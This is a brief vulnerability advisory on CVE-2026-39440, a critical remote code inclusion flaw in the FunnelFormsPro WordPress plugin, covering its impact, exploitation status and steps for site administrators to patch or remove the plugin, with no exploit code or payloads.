Part of Lyceum Intelligence — deep-research In Focus reports → · Lyceum Corpus — ask the documents →

Full-text search across 381 articles. Typo-tolerant.

Lyceum News Desk ·

CVE-2026-39440 -- CVSS 9.9 Vulnerability Briefing

CVE-2026-39440 | CVSS 9.9 (Critical) | Exploit: No known exploit

What Is It

CVE-2026-39440 is a code injection vulnerability in the FunnelFormsPro WordPress plugin by Funnelforms LLC, affecting all versions through 3.8.1, which allows remote attackers to include and execute arbitrary code on the server.

Technical Detail

The flaw stems from improper control of code generation within FunnelFormsPro, classified under CWE-94 (Code Injection), and specifically enables Remote Code Inclusion, meaning an attacker can supply a malicious external resource or payload that the plugin fetches and executes in the server context. Exploitation likely involves manipulating a plugin parameter or input that is passed unsafely to a code execution or file inclusion function without adequate sanitization or validation. Successful exploitation results in full remote code execution on the hosting server, potentially leading to complete site compromise, data exfiltration, or lateral movement within the hosting environment.

Exploitation Status

No known exploit has been publicly documented or confirmed as of April 30, 2026. This vulnerability is not currently listed in the CISA Known Exploited Vulnerabilities catalog. Despite the absence of confirmed exploitation, the critical CVSS score of 9.9 and the nature of the flaw make it a high-priority target for opportunistic attackers who routinely scan for vulnerable WordPress plugins.

Who Is Targeting This

No specific threat actor attribution at this time. Vulnerabilities of this class in WordPress plugins are frequently targeted by automated scanning campaigns and opportunistic actors rather than advanced persistent threat groups, but no confirmed campaigns or attributed actors have been identified in connection with this CVE.

What To Do

Update FunnelFormsPro to a version released after 3.8.1 immediately, as all versions up to and including 3.8.1 are confirmed affected. If no patched version is yet available from Funnelforms LLC, the plugin should be deactivated and removed from all WordPress installations until a fix is released. Site administrators should audit server logs for anomalous file inclusion requests or unexpected outbound connections originating from the WordPress process. Web application firewall rules targeting remote file inclusion patterns should be enabled as a compensating control. Given the critical severity, treat this as a patch-now priority regardless of current exploitation status.

In Focus
All analysis →

Deep-research intelligence reports from Lyceum Intelligence — structured assessments with sourced claims and calibrated conclusions.

Browse Intelligence Reports →